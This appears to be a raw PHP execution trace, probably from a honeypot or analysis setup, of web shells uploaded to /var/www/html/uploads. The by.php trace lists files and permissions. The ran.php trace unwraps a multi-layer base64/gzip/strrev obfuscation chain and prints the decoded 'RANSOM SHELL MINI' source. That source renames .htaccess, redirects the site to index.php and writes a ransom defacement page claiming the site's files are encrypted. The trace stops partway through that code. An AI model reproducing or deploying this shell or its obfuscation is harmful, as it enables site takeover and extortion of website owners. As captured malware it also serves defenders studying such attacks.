4 41 0 0.005390 569192 is_writable 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 601 1 '/var/www/html/uploads/.htaccess'
4 41 1 0.005407 569232
4 41 R FALSE
4 42 0 0.005420 569192 is_readable 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 602 1 '/var/www/html/uploads/.htaccess'
4 42 1 0.005436 569232
4 42 R TRUE
4 43 0 0.005449 569192 perms 1 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 603 1 '/var/www/html/uploads/.htaccess'
5 44 0 0.005462 569192 fileperms 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 633 1 '/var/www/html/uploads/.htaccess'
5 44 1 0.005476 569232
5 44 R 33188
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 633 $perms = 33188
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 643 $info = '-'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 662 $info .= 'r'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 663 $info .= 'w'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 666 $info .= '-'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 669 $info .= 'r'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 670 $info .= '-'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 673 $info .= '-'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 676 $info .= 'r'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 677 $info .= '-'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 680 $info .= '-'
4 43 1 0.005605 569232
4 43 R '-rw-r--r--'
4 45 0 0.005619 569192 is_writable 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 604 1 '/var/www/html/uploads/.htaccess'
4 45 1 0.005635 569232
4 45 R FALSE
4 46 0 0.005648 569192 is_readable 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 604 1 '/var/www/html/uploads/.htaccess'
4 46 1 0.005663 569232
4 46 R TRUE
4 47 0 0.005677 569192 is_file 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 588 1 '/var/www/html/uploads/by.php'
4 47 1 0.005692 569232
4 47 R TRUE
4 48 0 0.005705 569192 filesize 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 589 1 '/var/www/html/uploads/by.php'
4 48 1 0.005718 569232
4 48 R 13921
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 589 $size = 13.5947265625
4 49 0 0.005743 569096 round 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 590 2 13.5947265625 3
4 49 1 0.005758 569168
4 49 R 13.595
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 590 $size = 13.595
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 594 $size = '13.595 KB'
4 50 0 0.005799 569192 is_writable 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 601 1 '/var/www/html/uploads/by.php'
4 50 1 0.005816 569232
4 50 R FALSE
4 51 0 0.005829 569192 is_readable 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 602 1 '/var/www/html/uploads/by.php'
4 51 1 0.005843 569232
4 51 R TRUE
4 52 0 0.005856 569192 perms 1 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 603 1 '/var/www/html/uploads/by.php'
5 53 0 0.005870 569192 fileperms 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 633 1 '/var/www/html/uploads/by.php'
5 53 1 0.005883 569232
5 53 R 33204
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 633 $perms = 33204
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 643 $info = '-'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 662 $info .= 'r'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 663 $info .= 'w'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 666 $info .= '-'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 669 $info .= 'r'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 670 $info .= 'w'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 673 $info .= '-'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 676 $info .= 'r'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 677 $info .= '-'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 680 $info .= '-'
4 52 1 0.006011 569232
4 52 R '-rw-rw-r--'
4 54 0 0.006025 569192 is_writable 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 604 1 '/var/www/html/uploads/by.php'
4 54 1 0.006041 569232
4 54 R FALSE
4 55 0 0.006054 569192 is_readable 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 604 1 '/var/www/html/uploads/by.php'
4 55 1 0.006070 569232
4 55 R TRUE
4 56 0 0.006217 569192 is_file 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 588 1 '/var/www/html/uploads/data'
4 56 1 0.006235 569232
4 56 R FALSE
4 57 0 0.006250 569200 is_file 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 588 1 '/var/www/html/uploads/prepend.php'
4 57 1 0.006267 569248
4 57 R TRUE
4 58 0 0.006280 569208 filesize 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 589 1 '/var/www/html/uploads/prepend.php'
4 58 1 0.006295 569248
4 58 R 57
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 589 $size = 0.0556640625
4 59 0 0.006320 569104 round 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 590 2 0.0556640625 3
4 59 1 0.006335 569176
4 59 R 0.056
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 590 $size = 0.056
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 594 $size = '0.056 KB'
4 60 0 0.006373 569208 is_writable 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 601 1 '/var/www/html/uploads/prepend.php'
4 60 1 0.006390 569248
4 60 R FALSE
4 61 0 0.006404 569208 is_readable 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 602 1 '/var/www/html/uploads/prepend.php'
4 61 1 0.006421 569248
4 61 R TRUE
4 62 0 0.006434 569208 perms 1 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 603 1 '/var/www/html/uploads/prepend.php'
5 63 0 0.006448 569208 fileperms 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 633 1 '/var/www/html/uploads/prepend.php'
5 63 1 0.006463 569248
5 63 R 33261
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 633 $perms = 33261
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 643 $info = '-'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 662 $info .= 'r'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 663 $info .= 'w'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 666 $info .= 'x'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 669 $info .= 'r'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 670 $info .= '-'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 673 $info .= 'x'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 676 $info .= 'r'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 677 $info .= '-'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 680 $info .= 'x'
4 62 1 0.006599 569248
4 62 R '-rwxr-xr-x'
4 64 0 0.006613 569208 is_writable 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 604 1 '/var/www/html/uploads/prepend.php'
4 64 1 0.006630 569248
4 64 R FALSE
4 65 0 0.006643 569208 is_readable 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 604 1 '/var/www/html/uploads/prepend.php'
4 65 1 0.006659 569248
4 65 R TRUE
3 15 1 0.006674 569144
2 7 1 0.006687 510592
0.006710 428624
TRACE END [2023-02-13 00:25:15.122318]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:37:46.165155]
1 0 1 0.000133 393512
1 3 0 0.000276 414792 {main} 1 /var/www/html/uploads/ran.php 0 0
1 A /var/www/html/uploads/ran.php 8 $Cyber = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNENyaW1lJTI5JTI5JTI5JTI5JTI5JTI5JTI5JTI5JTNC'
1 A /var/www/html/uploads/ran.php 9 $Crime = '==gwWSd3qUgptOw/cfb71dEDSyv/hfehpP4wM/qO0sLSzHjU88vfbegnvfBiKjvqYh2YO7gL8cMe4OfMXDbe+X/IPff6IC/8KITFHh5bVjwNuiZINz8Jy4EsBZDWuf9ph/w46jwFg2h6onyrldAjrlNAUsRmlkmJ30OHpM7AD7+zT6zSlGW+ha0HFiZApjV3ztu6FW8hzZBAlGzUY4xVpaFwV0yhqtFGwN5QVIJgwxi5RtEA0ZZHpzSYizSA0eJ5AHBdDHLdG/BxAHhL7yo7TCcUAXRcDXbcG7hP4IwsVugpRSNwdQ3w9SnxeQKwSkkQrpxPByLaYL6DRO0viwYKOHKjIt5aZBuY+rIZBwtL4p7Z/gDYjcvHNApnLzyiuO8CyvQsxzs97W6us1xdd9tI/slnprmGm8vd47500BnOQERifO87/j/Ci9PProhqcqKZJIOAYmRmmunIrx8k2vQ6T5515kMdO7vAzzwc/UT8/2YfRIfYrlkhC52leCOLedFP'
2 4 0 0.000346 414792 base64_decode 0 /var/www/html/uploads/ran.php 10 1 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNENyaW1lJTI5JTI5JTI5JTI5JTI5JTI5JTI5JTI5JTNC'
2 4 1 0.000368 415080
2 4 R 'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24Crime%29%29%29%29%29%29%29%29%3B'
2 5 0 0.000389 415048 urldecode 0 /var/www/html/uploads/ran.php 10 1 'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24Crime%29%29%29%29%29%29%29%29%3B'
2 5 1 0.000408 415272
2 5 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($Crime))))))));'
2 6 0 0.000427 414984 htmlspecialchars_decode 0 /var/www/html/uploads/ran.php 10 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($Crime))))))));'
2 6 1 0.000445 415208
2 6 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($Crime))))))));'
2 7 0 0.000475 417328 eval 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($Crime))))))));' /var/www/html/uploads/ran.php 10 0
3 8 0 0.000493 417328 strrev 0 /var/www/html/uploads/ran.php(10) : eval()'d code 1 1 '==gwWSd3qUgptOw/cfb71dEDSyv/hfehpP4wM/qO0sLSzHjU88vfbegnvfBiKjvqYh2YO7gL8cMe4OfMXDbe+X/IPff6IC/8KITFHh5bVjwNuiZINz8Jy4EsBZDWuf9ph/w46jwFg2h6onyrldAjrlNAUsRmlkmJ30OHpM7AD7+zT6zSlGW+ha0HFiZApjV3ztu6FW8hzZBAlGzUY4xVpaFwV0yhqtFGwN5QVIJgwxi5RtEA0ZZHpzSYizSA0eJ5AHBdDHLdG/BxAHhL7yo7TCcUAXRcDXbcG7hP4IwsVugpRSNwdQ3w9SnxeQKwSkkQrpxPByLaYL6DRO0viwYKOHKjIt5aZBuY+rIZBwtL4p7Z/gDYjcvHNApnLzyiuO8CyvQsxzs97W6us1xdd9tI/slnprmGm8vd47500BnOQERifO87/j/Ci9PProhqcqKZJIOAYmRmmunIrx8k2vQ6T5515kMdO7vAzzwc/UT8/2YfRIfYrlkhC52leCOLedFP'
3 8 1 0.000529 433744
3 8 R 'AdckKNsB0iQt2wHNJDLbeJwBwiQ923ic7X1pc+JGt/DnSVX+g0J8g33jsQXYHuOFhH0ZwDY7JCmXNiOBtkhivc/89/ecbklIQtiemTxP1XvrkvIA6tOnT5/9dDedu59KD8Xe+LHMyI6m5n784c5/lzgR3hmGuXMUR5VynXy7+9BiurVys8m06u363TltAGDb2agS42xM6T7hSGvnXLDtBDTwhrhh/odgYXhOmE8tY6GLN8zPqXyqmKrc0hbBUA0LHkpp/A8efvnxhzNFNxeO5PU1LFGyPpJhbhjRcBxJvA01eTgyn7JXLHsbHdJrdyxOt03OknQnPPhKVhzJfYQz+MipylS/YQSAlCyXJltSJeHriZpakqR/PUleNzLygtcUf+Sv4shFMV+5/A6O4PCWZC9Uh4weZI4qvTgU4u6cUIK6oCr6nLEk9T5BHtmyJDmJqG4wsiW93CdkxzHtm/NzjVsLon7GG4ZjA0EmfhEM7fzF0GGwlWQbmnR+cXZ1lsHe'
3 9 0 0.000563 433712 base64_decode 0 /var/www/html/uploads/ran.php(10) : eval()'d code 1 1 'AdckKNsB0iQt2wHNJDLbeJwBwiQ923ic7X1pc+JGt/DnSVX+g0J8g33jsQXYHuOFhH0ZwDY7JCmXNiOBtkhivc/89/ecbklIQtiemTxP1XvrkvIA6tOnT5/9dDedu59KD8Xe+LHMyI6m5n784c5/lzgR3hmGuXMUR5VynXy7+9BiurVys8m06u363TltAGDb2agS42xM6T7hSGvnXLDtBDTwhrhh/odgYXhOmE8tY6GLN8zPqXyqmKrc0hbBUA0LHkpp/A8efvnxhzNFNxeO5PU1LFGyPpJhbhjRcBxJvA01eTgyn7JXLHsbHdJrdyxOt03OknQnPPhKVhzJfYQz+MipylS/YQSAlCyXJltSJeHriZpakqR/PUleNzLygtcUf+Sv4shFMV+5/A6O4PCWZC9Uh4weZI4qvTgU4u6cUIK6oCr6nLEk9T5BHtmyJDmJqG4wsiW93CdkxzHtm/NzjVsLon7GG4ZjA0EmfhEM7fzF0GGwlWQbmnR+cXZ1lsHe'
3 9 1 0.000625 450128
3 9 R '\001�$(�\001�$-�\001�$2�x�\001�$=�x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]�'
3 10 0 0.000836 433712 gzinflate 0 /var/www/html/uploads/ran.php(10) : eval()'d code 1 1 '\001�$(�\001�$-�\001�$2�x�\001�$=�x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]�'
3 10 1 0.001053 446032
3 10 R '\001�$-�\001�$2�x�\001�$=�x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]��C��wQY2'
3 11 0 0.001263 429616 gzinflate 0 /var/www/html/uploads/ran.php(10) : eval()'d code 1 1 '\001�$-�\001�$2�x�\001�$=�x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]��C��wQY2'
3 11 1 0.001469 441936
3 11 R '\001�$2�x�\001�$=�x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]��C��wQY2���}�'
3 12 0 0.001678 429616 gzinflate 0 /var/www/html/uploads/ran.php(10) : eval()'d code 1 1 '\001�$2�x�\001�$=�x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]��C��wQY2���}�'
3 12 1 0.001884 441936
3 12 R 'x�\001�$=�x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]��C��wQY2���}���f��?H'
3 13 0 0.002092 429616 gzuncompress 0 /var/www/html/uploads/ran.php(10) : eval()'d code 1 1 'x�\001�$=�x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]��C��wQY2���}���f��?H'
3 13 1 0.002303 441936
3 13 R 'x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]��C��wQY2���}���f��?H�eXϖd\032'
3 14 0 0.002515 429616 gzuncompress 0 /var/www/html/uploads/ran.php(10) : eval()'d code 1 1 'x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]��C��wQY2���}���f��?H�eXϖd\032'
3 14 1 0.002865 462416
3 14 R '<!DOCTYPE html>\r\n<html>\r\n<head>\r\n <title>RANSOM SHELL MINI</title>\r\n<style type="text/css">\r\nbody {\r\n background: #1A1C1F;\r\n color: #e2e2e2;\r\n}\r\n.inpute{\r\n border-style: dotted;\r\n border-color: #379600;\r\n background-color: transparent;\r\n color: white;\r\n text-align: center;\r\n}\r\n.selecte{\r\n border-style: dotted;\r\n border-color: green;\r\n background-color: transparent;\r\n color: green;\r\n}\r\n.submite{\r\n border-style: dotted;\r\n'
3 15 0 0.003422 567832 eval 1 '?><!DOCTYPE html>\r\n<html>\r\n<head>\r\n <title>RANSOM SHELL MINI</title>\r\n<style type="text/css">\r\nbody {\r\n background: #1A1C1F;\r\n color: #e2e2e2;\r\n}\r\n.inpute{\r\n border-style: dotted;\r\n border-color: #379600;\r\n background-color: transparent;\r\n color: white;\r\n text-align: center;\r\n}\r\n.selecte{\r\n border-style: dotted;\r\n border-color: green;\r\n background-color: transparent;\r\n color: green;\r\n}\r\n.submite{\r\n border-style: dotted;\r\n border-color: #4CAF50;\r\n background-color: transparent;\r\n color: white;\r\n}\r\n.result{\r\n text-align: left;\r\n}\r\n</style>\r\n<link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">\r\n</head>\r\n<body>\r\n<div class="result">\r\n<?php\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\'memory_limit\', \'-1\');\r\nclass deRanSomeware\r\n{\r\n public function shcpackInstall(){\r\n if(!file_exists(".htaFuck")){\r\n rename(".htaccess", ".htaFuck");\r\n if(fwrite(fopen(\'.htaccess\', \'w\'), "#5H311_1NJ3C706\\r\\nDirectoryIndex index.php\\r\\nErrorDocument 404 /index.php")){\r\n echo \'<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> .htaccess (Default Page)<br>\';\r\n }\r\n if(file_put_contents("index.php", base64_decode("CjwhRE9DVFlQRSBodG1sPgo8aHRtbD4KICAgPGhlYWQ+CgkgIDx0aXRsZT5BbGwgWW91ciBXZWJzaXRlIERhdGFiYXNlIEZpbGVzIEFyZSBFbmNyeXB0ZWQ8L3RpdGxlPgogICAgICA8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICAgIDxtZXRhIGNvbnRlbnQ9IjVIMzExXzFOSjNDNzA2IiBuYW1lPSJkZXNjcmlwdGlvbiIvPgogICAgICA8bWV0YSBjb250ZW50PSI1SDMxMV8xTkozQzcwNiIgbmFtZT0ia2V5d29yZHMiLz4KICAgICAgPG1ldGEgcHJvcGVydHk9Im9nOmltYWdlIiBjb250ZW50PSJodHRwOi8vczI5LnBvc3RpbWcub3JnLzdydTJxNzZqYi9rY3dfbG9nb19kZWZhY2UucG5nIiAvPgoKICAgICAgPGxpbmsgaHJlZj0iaHR0cDovL2ZvbnRzLmdvb2dsZWFwaXMuY29tL2Nzcz9mYW1pbHk9QmxhY2srT3BzK09uZXxNb250c2VycmF0fENhYmluK1NrZXRjaHxPcmJpdHJvbnxBcmNoaXRlY3RzK0RhdWdodGVyfFBlcm1hbmVudCtNYXJrZXJ8THVja2llc3QrR3V5fENoZXJyeStDcmVhbStTb2RhIiByZWw9InN0eWxlc2hlZXQiIC8+CiAgICAgIDxsaW5rIGhyZWY9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2FuaW1hdGUuY3NzLzMuNS4yL2FuaW1hdGUubWluLmNzcyIgcmVsPSJzdHlsZXNoZWV0IiAvPgogICAgICA8bGluayBocmVmPSJodHRwczovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvbGlicy9mb250LWF3ZXNvbWUvNC43LjAvY3NzL2ZvbnQtYXdlc29tZS5taW4uY3NzIiByZWw9InN0eWxlc2hlZXQiIC8+CiAgICAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHA6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LWxhdGVzdC5taW4uanMiPjwvc2NyaXB0PgogICAgICAKCiAgICAgIDwhLS0gQ1NTIFNUQVJUIEhFUkUgLS0+CiAgICAgIDxzdHlsZT4KCQkgaHRtbCwgYm9keSB7bWluLWhlaWdodDogMTAwJTt9CiAgICAgICAgIGJvZHkgewoJCSB3aWR0aDogMTAwJTsKCQkgaGVpZ2h0OiAxMDAlOwogICAgICAgICBtYXJnaW46IDA7CiAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgIGJhY2tncm91bmQtaW1hZ2U6IHVybCgnaHR0cHM6Ly9pbWFnZXM0LmFscGhhY29kZXJzLmNvbS82MzQvdGh1bWItMTkyMC02MzQ0NC5qcGcnKTsKICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogIzAwMDsKICAgICAgICAgYmFja2dyb3VuZC1yZXBlYXQ6IG5vLXJlcGVhdDsKICAgICAgICAgYmFja2dyb3VuZC1wb3NpdGlvbjogY2VudGVyOwogICAgICAgICBiYWNrZ3JvdW5kLXNpemU6IDE1MCU7CiAgICAgICAgIGJhY2tncm91bmQtY29sb3I6ICMwMDA7CiAgICAgICAgIGNvbG9yOiAjRkZGRkZGOwogICAgICAgICBmb250LWZhbWlseToiT3JiaXRyb24iOwogICAgICAgICBmb250LXNpemU6IDE0cHQ7CiAgICAgICAgIHRleHQtYWxpZ246IGNlbnRlcjsKICAgICAgICAgdGV4dC1kZWNvcmF0aW9uOiBub25lOwogICAgICAgICB9IAogICAgICAgICBhIHsgdGV4dC1kZWNvcmF0aW9uOiBub25lOyB9CiAgICAgICAgIC52aXMgewoJCSAgdGV4dC1zaGFkb3c6IDJweCAycHggMnB4ICMwMDA7CgkJIH0KICAgICAgICAgLmdsb3cgewogICAgICAgICB0ZXh0LXNoYWRvdzogMCAw